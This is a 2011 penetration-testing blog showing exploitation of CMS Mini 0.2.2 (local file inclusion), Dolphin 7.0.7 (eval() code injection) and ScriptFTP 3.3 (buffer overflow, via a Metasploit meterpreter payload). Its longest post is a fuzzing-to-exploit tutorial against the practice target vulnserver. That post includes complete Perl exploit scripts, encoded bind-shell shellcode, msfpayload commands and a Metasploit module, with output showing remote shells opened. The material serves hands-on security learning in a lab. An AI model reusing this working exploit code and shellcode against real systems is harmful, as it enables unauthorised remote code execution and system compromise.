Thursday, 20 October 2011

CMS Mini 0.2.2 Local File Inclusion Vulnerabilities



CMS Mini 0.2.2 Multiple Local File Inclusion Vulnerabilities

Hi everyone, this is a really quick post, this is just to show a LFI on CMS mini 0.2.2

Just access this URL and put some ../../../../ and the file that you wanna look, don't forget to change the IP address to your server.


I know, its a boring post ;)


Dolphin 7.0.7 "eval()" PHP Code Execution Vulnerability



Dolphin "eval()" PHP Code Execution Vulnerability

Secunia Advisory SA46457
Release Date 2011-10-19
URL http://secunia.com/advisories/46457/
Exploit URL : http://www.exploit-db.com/exploits/17994/
Description: A vulnerability has been discovered in Dolphin, which can be exploited by malicious users to compromise a vulnerable system. Input passed via the "bubbles" parameter to member_menu_queries.php (when "action" is set to "get_bubbles_values") is not properly sanitised before being used in an "eval()" call. This can be exploited to execute arbitrary PHP code.


The vulnerability is confirmed in version 7.0.7. Other versions may also be affected.

----

Hi everyone, so, this is just a quick post to show dolphin 7.0.7 exploit. This is how you test it :
1) Download the application from http://www.4shared.com/file/HTsuoYry/Dolphin-v707.html
2) Install it
3) Download the exploit
4) Run the exploit in the format : php dolphin707.php 172.16.1.70 /dolphin/ user pass
Remember to change the ip to match yours.
5) You got your shell

This is what looks like
root@bt:~/exploits# php dolphin707.php 172.16.1.70 /dolphin/ admin hacktest

+------------------------------------------------------------+
| Dolphin <= 7.0.7 Remote PHP Code Injection Exploit by EgiX |
+------------------------------------------------------------+

dolphin-shell# id
uid=48(apache) gid=48(apache) groups=48(apache)



Thanks for whatching.

Tuesday, 18 October 2011

10k visits

I just want to say thank you all for visiting my blog, I just reached 10k visits and I am really pleased !!

Thursday, 13 October 2011

Twitter

H everyone, after 1 week battle with twitter, I finally got my account up and running. I got banned since day one because they thought that I was managing loads of accounts, yeah, right.. well, anyway, now you guys can follow me in twitter at #pochackblog

Thank you all.

Sunday, 9 October 2011

AmmSoft ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability



AmmSoft ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability
Class: Boundary Condition Error
CVE:
Remote: Yes
Local: No
Published: Sep 20 2011 12:00AM
Updated: Sep 30 2011 07:00AM
Credit: Tom Gregory
Vulnerable: AmmSoft ScriptFTP 3.3
URL : http://www.securityfocus.com/bid/49707
Description : ScriptFTP is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the application. Failed attacks may cause a denial-of-service condition. ScriptFTP 3.3 is vulnerable; other versions may also be affected.

In order to exploit this you can either use the python or the metasploit exploit, I prefer using the the metasploit because of the payloads. So the first thing you need to do is put the exploit under the folder /pentest/exploits/framework3/modules/exploits/windows , I called mine scriptftp33.rb , just paste the content of
http://www.securityfocus.com/data/vulnerabilities/exploits/49707.rb

Now step by step
1) msfconsole
2) use windows/ftp/scriptftp33 ( To use the exploit that we just created)
3) set PAYLOAD windows/meterpreter/bind_tcp (To use meterpreter as our payload)
4) set RHOST 172.16.1.7 (This is the ip address of the server that I am attacking)
5) exploit

Ok, now the attacking server bit is ready to go, you need to download the ftp script from
http://www.scriptftp.com/ScriptFTP_3_3_setup.exe and install it
Open the scriptftp and create and script with the following content:

OPENHOST("172.16.1.79","ftptest","passwordtest")
SETPASSIVE(ENABLED)
GETLIST($list,REMOTE_FILES)
CLOSEHOST


172.16.1.79 = The ip address of the attacking server.
ftptest = username
passwordtest = password
Remember to create this user in your attacking server.
Save it as exploit.ftp
Now click open and select exploit.ftp
If everything goes all right, in your metasploit you now should see something like this :
msf exploit(scriptftp33) > [*] 172.16.1.7:1518 LOGIN ftptest / passwordtest
[*] - Data connection set up
[*] - Sending directory list via data connection
[*] Sending stage (752128 bytes) to 172.16.1.7
[*] Meterpreter session 1 opened (172.16.1.79:37594 -> 172.16.1.7:4444) at 2011-09-30 10:15:21

+0100

Right, now you have your meterpreter session, just type " sessions -i 1" and you can do everything you want ;)

That's it guys.

From fuzzing to creating an exploit



Hi everyone, this is a complex post, but I will do my best to explain the bits and pieces with some URL's that you guys can read a bit better to understand everything I am trying to explain, I did this thing a few weeks ago, and I think its interesting to post what I have done, so you guys can understand a bit better on how things are made and how hackers get to the point of creating an exploit, I will not go really deep on the explanations because then the post will become really boring and no one will watch it, so lets see if I get some of you that are curious about the subject to watch the video until the end.
The first thing you will need is a vulnerable server, there is a project created by "lupin" that you can download and do your own tests, so please, download the vulnserver from this URL.

http://grey-corner.blogspot.com/2010/12/introducing-vulnserver.html
And download the OLLYDBG from:
http://www.ollydbg.de/

You will find the download link in the bottom of the webpage.
Please, do not run this in a production server as MAY crash the server, it never happen to me.. but who knows ;)
Before you read the post , I recommend that you read the following wikis.

EIP = http://en.wikipedia.org/wiki/Instruction_pointer
Buffer overflow = http://en.wikipedia.org/wiki/Buffer_overflow
SEH = http://en.wikipedia.org/wiki/Structured_Exception_Handling#Structured_Exception_Handling
FUZZ Testing = http://en.wikipedia.org/wiki/Fuzz_testing
nops = http://forum.hitb.org/viewtopic.php?f=1&t=17925


Ok, lets do this , bellow are the step by step of the thing you will need to do.

1) Launch the server (vulnserver.exe) that will open port 9999
2) Now open up a shell in your backtrack and telnet 172.16.1.7 9999 , then HELP
3) This is the list of commands that may have or may not have problems
STATS [stat_value]
RTIME [rtime_value]
LTIME [ltime_value]
SRUN [srun_value]
TRUN [trun_value]
GMON [gmon_value]
GDOG [gdog_value]
KSTET [kstet_value]
GTER [gter_value]
HTER [hter_value]
LTER [lter_value]
KSTAN [lstan_value]
STATS [stat_value]
RTIME [rtime_value]
LTIME [ltime_value]
SRUN [srun_value]
TRUN [trun_value]
GMON [gmon_value]
GDOG [gdog_value]
KSTET [kstet_value]
GTER [gter_value]
HTER [hter_value]
LTER [lter_value]
KSTAN [lstan_value]


4) Play a bit typing commands like "STATS COMMAND" , it will return "STATS VALUE NORMAL"
or "TRUN COMMAND" , it will return TRUN COMPLETE.

5) Now, in your backtrack, go to /pentest/fuzzers/spike/src and type ". ld.sh" , this will fix a bug in backtrack that prevents us to do the next step.

7) There is a command called generic_send_tcp that we will use to send our junk to the server.
You will need to create a script called stats.spk with the following content :
s_readline(); //this will read the banner that the server is sending to us
s_string("STATS ");
s_string_variable("COMMAND");

Now, you save it and run it.
./generic_send_tcp 172.16.1.7 9999 ./stats.spk 0 0
172.16.1.7 = The server that is running the vunlserver.exe
What we are doing here is testing the server for that specific command STATS, the command generic_send_tcp will send a lot of random junk to the server and it will try to crash it.

As you can see, the application did not crash, that means that the command STATS does not contain any buffer overflow problem. Lets try with another command , TRUN

Create the script trun.spk
s_readline(); //this will read the banner that the server is sending to us
s_string("TRUN ");
s_string_variable("COMMAND");

Save it and run.
./generic_send_tcp 172.16.1.7 9999 ./trun.spk 0 0
As you can see, now the application crashed.
Now you will have to find out:
1) What caused it to crash
2) How many bytes caused to crash, because we want to find the EIP value.

In order to do that, we need to run wireshark on the background to capture the packages , so we can do some further analyses.
With wireshark running, run the generic_send_tcp again against TRUN command .
Ok, it crashed again, you can stop wireshark and put the filter tcp.port==9999 , so it will show only what it matters for us.
Now you need to click on Follow tcp stream until you find a lot of AAAAAAA, those AAAAAAA were generated by the generic_send_tcp, you can see that this is the one that we are looking for because at the end of the AAAA there is no proper closed connection meaning that the server crashed.

Now, save as crash.txt (Only what you sent to the server, that's 5009 bytes).
You should ask yourself now how many bytes it took to make the application to crash?

With the command "wc -m crash.txt" you will find that out.
The output is 5009 bytes crash.txt , but if you remove "TRUN /.:/" from the beginning that is equal to 5000.

Create a file called exploit1.pl with the follow content:
#!/usr/bin/perl
use IO::Socket;
$header = "TRUN /.:/";
$junk="\x41" x 5000; #That is 5000xA , we are sending 5000 bytes to the server.
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
);
$socket->recv($serverdata, 1024);
print $serverdata;
$socket->send($header.$junk);

Save it and give execute permission chmod +x exploit1.pl
Now execute ./exploit1.pl 172.16.1.7 9999
As expected the application crashed again, now we need to create a pattern with 5000 bytes, in order to do that, type the command:

/pentest/exploits/framework3/tools/pattern_create.rb 5000

Now create an exploit2.pl with EXACT the same content, except the $junk, instead "\x41 X 5000" , you will insert the pattern that you just created.

Save it , give execute permission . Before you execute this time, please open up your OLLYDBD and attach the vunlserver.exe (File-Attach)
Click the Play button and now execute the exploit again.

./exploit2.pl 172.16.1.7 9999


You will see that the application crashed with the message : "Don't know how to continue because memory at address 386F4337 is not readable. Try to change the EIP or pass exception to program"



Ok, bingo!! That's what we want , that address 386F4337 is our EIP and if you are running on a window XP SP3 , you should get the same EIP!

Now you need to look for that value in the memory, in order to do that, type in your backtrack

/pentest/exploits/framework3/tools/pattern_offset.rb 0x386F4337 5000
The output is 2003

Now you need to overwrite the EIP with a jump esp instruction , that's the basic stack overflow technique. You can use the msfpescan against the .dll of the software, in this case essfunc.dll

msfpescan -j esp essfunc.dll
and you wil get something like this :
[essfunc.dll]
0x625011af jmp esp
0x625011bb jmp esp
0x625011c7 jmp esp
0x625011d3 jmp esp
0x625011df jmp esp
0x625011eb jmp esp
0x625011f7 jmp esp
0x62501203 jmp esp
0x62501205 jmp esp


Get the first one ( 0x625011af)
As we are working with an intel system, we need to put in reverse our $eip variable.
$eip=pack('V',0x625011af); # v for reverse

Now, you need to launch a program in the target(payload), like calc.exe or cmd or anything you like, to do that, there is a command that will encode this into a payload format.
The possibilities are endless, here are some examples of what you can do
To open calc.exe
/pentest/exploits/framework3/msfpayload windows/exec CMD=calc EXITFUNC=seh R | /pentest/exploits/framework3/msfencode -t perl -e x86/alpha_upper

To bind the command prompt to port 4444
msfpayload windows/shell_bind_tcp lport=4444 exitfunc=process R | msfencode -t perl -e x86/alpha_upper

In this next exploit I will put all above together and I will be using the shell_bind_tcp, so lets call it exploit3.pl

#!/usr/bin/perl
use IO::Socket;
$header = "TRUN /.:/";
$junk="\x41" x 2003;
$eip=pack('V',0x625011af);
$nop="\x90" x 20;
$shellcode= "\x89\xe5\xda\xd1\xd9\x75\xf4\x59\x49\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58" .
"\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42" .
"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" .
"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48" .
"\x4b\x39\x45\x50\x45\x50\x45\x50\x45\x30\x4d\x59\x5a\x45" .
"\x50\x31\x58\x52\x45\x34\x4c\x4b\x56\x32\x56\x50\x4c\x4b" .
"\x56\x32\x54\x4c\x4c\x4b\x51\x42\x45\x44\x4c\x4b\x54\x32" .
"\x47\x58\x54\x4f\x4e\x57\x50\x4a\x47\x56\x56\x51\x4b\x4f" .
"\x50\x31\x49\x50\x4e\x4c\x47\x4c\x43\x51\x43\x4c\x54\x42" .
"\x56\x4c\x47\x50\x49\x51\x58\x4f\x54\x4d\x45\x51\x49\x57" .
"\x5a\x42\x4c\x30\x50\x52\x50\x57\x4c\x4b\x51\x42\x54\x50" .
"\x4c\x4b\x51\x52\x47\x4c\x45\x51\x58\x50\x4c\x4b\x47\x30" .
"\x54\x38\x4d\x55\x49\x50\x43\x44\x51\x5a\x43\x31\x58\x50" .
"\x50\x50\x4c\x4b\x47\x38\x52\x38\x4c\x4b\x51\x48\x51\x30" .
"\x45\x51\x4e\x33\x5a\x43\x47\x4c\x50\x49\x4c\x4b\x56\x54" .
"\x4c\x4b\x43\x31\x4e\x36\x56\x51\x4b\x4f\x56\x51\x49\x50" .
"\x4e\x4c\x4f\x31\x58\x4f\x54\x4d\x43\x31\x58\x47\x50\x38" .
"\x4d\x30\x54\x35\x4b\x44\x54\x43\x43\x4d\x5a\x58\x47\x4b" .
"\x43\x4d\x47\x54\x52\x55\x4d\x32\x51\x48\x4c\x4b\x56\x38" .
"\x47\x54\x43\x31\x4e\x33\x52\x46\x4c\x4b\x54\x4c\x50\x4b" .
"\x4c\x4b\x56\x38\x45\x4c\x43\x31\x49\x43\x4c\x4b\x45\x54" .
"\x4c\x4b\x45\x51\x58\x50\x4b\x39\x47\x34\x47\x54\x47\x54" .
"\x51\x4b\x51\x4b\x45\x31\x51\x49\x50\x5a\x56\x31\x4b\x4f" .
"\x4d\x30\x50\x58\x51\x4f\x51\x4a\x4c\x4b\x45\x42\x5a\x4b" .
"\x4d\x56\x51\x4d\x43\x58\x47\x43\x47\x42\x45\x50\x43\x30" .
"\x52\x48\x54\x37\x43\x43\x47\x42\x51\x4f\x51\x44\x43\x58" .
"\x50\x4c\x43\x47\x56\x46\x54\x47\x4b\x4f\x49\x45\x4e\x58" .
"\x5a\x30\x43\x31\x45\x50\x43\x30\x56\x49\x4f\x34\x51\x44" .
"\x50\x50\x52\x48\x56\x49\x4d\x50\x52\x4b\x45\x50\x4b\x4f" .
"\x4e\x35\x56\x30\x56\x30\x56\x30\x50\x50\x47\x30\x50\x50" .
"\x47\x30\x56\x30\x45\x38\x4b\x5a\x54\x4f\x49\x4f\x4d\x30" .
"\x4b\x4f\x49\x45\x4c\x49\x49\x57\x56\x51\x49\x4b\x50\x53" .
"\x45\x38\x54\x42\x43\x30\x52\x31\x51\x4c\x4c\x49\x4d\x36" .
"\x52\x4a\x54\x50\x56\x36\x50\x57\x45\x38\x4f\x32\x49\x4b" .
"\x47\x47\x43\x57\x4b\x4f\x49\x45\x56\x33\x50\x57\x52\x48" .
"\x4e\x57\x5a\x49\x50\x38\x4b\x4f\x4b\x4f\x49\x45\x56\x33" .
"\x56\x33\x51\x47\x52\x48\x52\x54\x5a\x4c\x47\x4b\x4b\x51" .
"\x4b\x4f\x58\x55\x56\x37\x4d\x59\x58\x47\x43\x58\x54\x35" .
"\x52\x4e\x50\x4d\x45\x31\x4b\x4f\x58\x55\x45\x38\x45\x33" .
"\x52\x4d\x43\x54\x45\x50\x4c\x49\x4b\x53\x56\x37\x50\x57" .
"\x50\x57\x50\x31\x4c\x36\x52\x4a\x45\x42\x56\x39\x50\x56" .
"\x4b\x52\x4b\x4d\x45\x36\x49\x57\x50\x44\x47\x54\x47\x4c" .
"\x43\x31\x45\x51\x4c\x4d\x50\x44\x56\x44\x54\x50\x58\x46" .
"\x45\x50\x50\x44\x51\x44\x50\x50\x51\x46\x50\x56\x51\x46" .
"\x50\x46\x56\x36\x50\x4e\x51\x46\x51\x46\x50\x53\x51\x46" .
"\x45\x38\x52\x59\x58\x4c\x47\x4f\x4c\x46\x4b\x4f\x49\x45" .
"\x4c\x49\x4d\x30\x50\x4e\x51\x46\x50\x46\x4b\x4f\x50\x30" .
"\x45\x38\x43\x38\x4b\x37\x45\x4d\x45\x30\x4b\x4f\x49\x45" .
"\x4f\x4b\x4c\x30\x58\x35\x49\x32\x51\x46\x45\x38\x4f\x56" .
"\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x49\x45\x47\x4c\x54\x46" .
"\x43\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b\x50\x54\x35\x43\x35" .
"\x4f\x4b\x47\x37\x45\x43\x54\x32\x52\x4f\x52\x4a\x45\x50" .
"\x51\x43\x4b\x4f\x4e\x35\x41\x41";

$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
);
$socket->recv($serverdata, 1024);
print $serverdata;
$socket->send($header.$junk.$eip.$nop.$shellcode);


Save it , give execute permission and run it.
If everything goes according to the plan, you should be able to telnet the server on port 4444 and get your shell after the execution of the exploit, lets try it.

root@bt:~# ./vulnserv_shell.pl 172.16.1.7 9999
Welcome to Vulnerable Server! Enter HELP for help.
root@bt:~# telnet 172.16.1.7 4444
Trying 172.16.1.7...
Connected to 172.16.1.7.
Escape character is '^]'.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\temp>


And we have our shell!!! Great.
Now you can convert your perl exploit to the metasploit format.
Create a file under /pentest/exploits/framework3/modules/exploits/windows/misc/ called
vulnserver.rb with the following content :


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info={}) super(update_info(info, 'Name' => 'Vuln server',
'Description' => %q{
Angelo test.
},
'Author' => 'Angelo' ,
'Version' => '$Revision: 13646 1$',
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0d\x20\xad",
},
'Targets' =>
[
[ 'Windows XP SP3',{'Ret'=> 0x625011af,}],
],
'DefaultTarget' => 0,
))
register_options([ Opt::RPORT(9999)],self.class)


end

def exploit
connect

header = "TRUN /.:/"
junk = make_nops(2003)
eip = [target.ret].pack('V')
nops = make_nops(20)

sploit = header + junk + eip + nops + payload.encoded

print_status("Trying #{target.name}...")

sock.put(sploit)

handler
disconnect
end

end



And now lets try to exploit using metasploit

msf > use windows/misc/vulnserver
msf exploit(vulnserver) > set RHOST 172.16.1.7
RHOST => 172.16.1.7
msf exploit(vulnserver) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(vulnserver) > set EXITFUNC seh
EXITFUNC => seh
msf exploit(vulnserver) > exploit

[*] Started bind handler
[*] Trying Windows XP SP3...
[*] Command shell session 1 opened (172.16.1.79:52672 -> 172.16.1.7:4444) at 2011-09-30 14:09:01

+0100

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\temp>


And there you go, working with metasploit as well.

Phewwww, that was a long post, and I hope everyone enjoyed.

Thank you all.